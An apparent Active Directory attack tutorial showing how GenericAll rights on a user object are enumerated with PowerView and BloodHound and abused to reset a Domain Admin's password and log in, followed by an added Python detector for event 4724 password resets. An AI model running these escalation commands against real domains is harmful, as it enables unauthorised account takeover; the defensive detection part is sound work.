GenericAll
GenericAll is a permission that grants full rights over an Active Directory object. If you have GenericAll on a user object, you can reset that user's password without knowing the current one, thereby escalating your privileges.
Enumeration
PowerView
GenericAll Enumeration
Get your current user's SID by running whoami /user, import PowerView, then execute the command below to list the objects on which you have the GenericAll right.
Command
Get-ObjectAcl -ResolveGUIDs | ? {($_.SecurityIdentifier -eq "[your_current_user_sid]") -and ($_.ActiveDirectoryRights -eq "GenericAll")}
The image below shows that the current user usman has the GenericAll right on the user object ali.

User Enumeration
Execute the command below to get more information about the target user.
Command
Get-NetUser [target_user]
The image below shows that the target user ali is a member of Domain Admins.

BloodHound
You can also get the same result using BloodHound.
The image below shows that the current user usman has the GenericAll right on the user object ali, who is a member of Domain Admins.

Exploitation
PowerView
Since you have the GenericAll right on the user ali, you can reset his password and log in to his account by executing the commands below.
Command
$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
Set-DomainUserPassword -Identity [target_user] -AccountPassword $pass
runas /user:[domain\user] cmd.exe
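From the defender's side, the password reset above is recorded on the domain controller as Windows Security event 4724 ("An attempt was made to reset an account's password"), with the resetting account in SubjectUserName and the account whose password was reset in TargetUserName. The following is an added detection example, not code from the original page: it runs a simple rule over constructed event records exported as JSON lines and flags resets where one account resets another's password, with the highest severity when the target is a privileged account such as a Domain Admin. The field names follow the Windows event XML; the user names, domain, timestamps, privileged-user set and approved-resetter set are constructed assumptions for the example.

```python
"""Detect one account resetting another account's password (the GenericAll
abuse path shown above) from Windows Security event 4724 records.

Assumption: events have been exported as JSON lines, one event per line, with
the Windows event XML field names EventID, SubjectUserName, TargetUserName,
TargetDomainName plus a TimeCreated timestamp.  All sample data is constructed.
"""
import json

# Event 4724: "An attempt was made to reset an account's password".
PASSWORD_RESET_EVENT = 4724

# Constructed sample export (not real log data).
SAMPLE_LOG = """\
{"EventID": 4724, "SubjectUserName": "usman", "TargetUserName": "ali", "TargetDomainName": "CORP", "TimeCreated": "2024-01-01T10:00:00Z"}
{"EventID": 4724, "SubjectUserName": "ali", "TargetUserName": "ali", "TargetDomainName": "CORP", "TimeCreated": "2024-01-01T10:05:00Z"}
{"EventID": 4724, "SubjectUserName": "helpdesk-svc", "TargetUserName": "bob", "TargetDomainName": "CORP", "TimeCreated": "2024-01-01T10:10:00Z"}
{"EventID": 4624, "SubjectUserName": "usman", "TargetUserName": "usman", "TargetDomainName": "CORP", "TimeCreated": "2024-01-01T10:11:00Z"}
not-a-json-line
{"EventID": 4724, "SubjectUserName": "usman", "TargetUserName": "alice", "TargetDomainName": "CORP", "TimeCreated": "2024-01-01T10:12:00Z"}
"""

# Hypothetical sets: accounts whose password should only be reset through an
# approved process, and the accounts allowed to reset others' passwords.
PRIVILEGED_USERS = {"ali", "administrator"}
APPROVED_RESETTERS = {"helpdesk-svc"}

SEVERITY_ORDER = {"info": 0, "low": 1, "medium": 2, "high": 3}


def parse_events(text):
    """Parse JSON-lines export; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def classify_reset(event):
    """Return a severity for a 4724 event, or None for any other event."""
    if event.get("EventID") != PASSWORD_RESET_EVENT:
        return None
    subject = event.get("SubjectUserName", "").lower()
    target = event.get("TargetUserName", "").lower()
    if subject == target:
        return "info"      # account acting on itself
    if subject in APPROVED_RESETTERS:
        return "low"       # expected helpdesk activity, keep for audit
    if target in PRIVILEGED_USERS:
        return "high"      # non-approved account reset a privileged account
    return "medium"        # non-approved account reset someone else's password


def find_suspicious_resets(text, min_severity="medium"):
    """Return alerts for resets at or above min_severity, in log order."""
    alerts = []
    for ev in parse_events(text):
        sev = classify_reset(ev)
        if sev is not None and SEVERITY_ORDER[sev] >= SEVERITY_ORDER[min_severity]:
            alerts.append({
                "severity": sev,
                "subject": ev["SubjectUserName"],
                "target": ev["TargetUserName"],
                "domain": ev.get("TargetDomainName"),
                "time": ev.get("TimeCreated"),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_resets(SAMPLE_LOG):
        print(alert)
```

On the constructed sample this yields two alerts: usman resetting ali (high, since ali is in the privileged set) and usman resetting alice (medium); the helpdesk reset is kept only when the threshold is lowered to "low". A real deployment would populate PRIVILEGED_USERS from group membership (for example Domain Admins, as enumerated above) rather than a hard-coded set, and would correlate 4724 with the corresponding 4738 ("A user account was changed") event on the same target.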
